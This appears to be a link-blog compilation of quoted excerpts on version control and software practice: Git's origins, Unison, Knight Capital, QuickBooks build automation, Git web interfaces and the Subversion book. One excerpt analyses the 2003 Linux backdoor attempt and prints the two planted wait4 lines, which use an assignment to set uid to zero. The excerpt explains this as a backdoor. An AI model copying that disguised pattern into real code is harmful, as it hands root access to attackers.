Ten years ago this week, the Linux kernel community faced a daunting challenge: They could no longer use their revision control system BitKeeper and no other Software Configuration Management (SCMs) met their needs for a distributed system. Linus Torvalds, the creator of Linux, took the challenge into his own hands and disappeared over the weekend to emerge the following week with Git. Today Git is used for thousands of projects and has ushered in a new level of social coding among programmers.
via 10 Years of Git: An Interview with Git Creator Linus Torvalds | Linux.com.
So git was basically designed and written for my requirements, and it shows.
Unison is a file-synchronization tool for Unix and Windows. It allows two replicas of a collection of files and directories to be stored on different hosts (or different disks on the same host), modified separately, and then brought up to date by propagating the changes in each replica to the other.
Unison shares a number of features with tools such as configuration management packages (CVS, PRCS, Subversion, BitKeeper, etc.), distributed filesystems (Coda, etc.), uni-directional mirroring utilities (rsync, etc.), and other synchronizers (Intellisync, Reconcile, etc).
via Unison File Synchronizer.
What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code:
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
via The Linux Backdoor Attempt of 2003.
Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … it’s a classic backdoor.
The check should have been current -> uid == 0. Sneaky!
It’s clear that Knight’s software was deployed without adequate verification. With a deadline that could not be extended, Knight had to choose between two alternatives: delaying their new system until they had a high degree of confidence in its reliability (possibly resulting in a loss of business to competitors in the interim), or deploying an incompletely verified system and hoping that any bugs would be minor. They did not choose wisely.
via Wall Street and the Mismanagement of Software | Dr Dobb’s.
What is needed is a change in the way that such critical software is developed and deployed. Safety-critical domains such as commercial avionics, where software failure could directly cause or contribute to the loss of human life, have known about this for decades. These industries have produced standards for software certification that heavily emphasize appropriate “life cycle” processes for software development, verification, and quality assurance. A “safety culture” has infused the entire industry, with hazard/safety analysis a key part of the overall process. Until the software has been certified as compliant with the standard, the plane does not fly. The result is an impressive record in practice: no human fatality on a commercial aircraft has been attributed to a software error.
As the manager with primary responsibility for build management, Burt has supervised the construction of automated systems that perform continuous builds and continuous integration. The systems incorporate tools for testing, version control, and scheduling.
via Building QuickBooks: How Intuit Manages 10 Million Lines of Code | Dr Dobb’s.
Most of all, the key to managing a large project was automation. “We automate everything that can be automated,” says Burt. “The tools make a huge difference. We maintain all the different versions of QuickBooks, on all our supported platforms, with about 60 code-writing developers. We couldn’t do that without automation.”
version control – What’s the best Web interface for Git repositories? – Stack Overflow.
- gitweb, which is developed together with git, and is written in Perl. Works both as CGI script, and legacy mod_perl script. There is repo.or.cz duct tape (soon to be released as Girocco), which together with gitweb make for git hosting interface. I think it most commonly used web interface; it is used for example by kernel.org.
- cgit is is a fast (caching) and lightweight webinterface written in C. It is used for example by freedesktop.org
- git-php and ViewGit are git web interfaces written in PHP.
Git is a free & open source, distributed version control system designed to handle everything from small to very large projects with speed and efficiency.
via Git – Fast Version Control System.
This is the home of Version Control with Subversion, a free book about the ubiquitous Apache™ Subversion® version control system and written by some of the developers of Subversion itself.
As you may have guessed from the layout of this page, we are quite pleased that some versions of this book have been published by O’Reilly Media. You can certainly buy a traditionally published print copy of the book if you’d like to, but you’ll always find the most recent versions here on this site, available in both HTML and PDF formats.
Version Control with Subversion.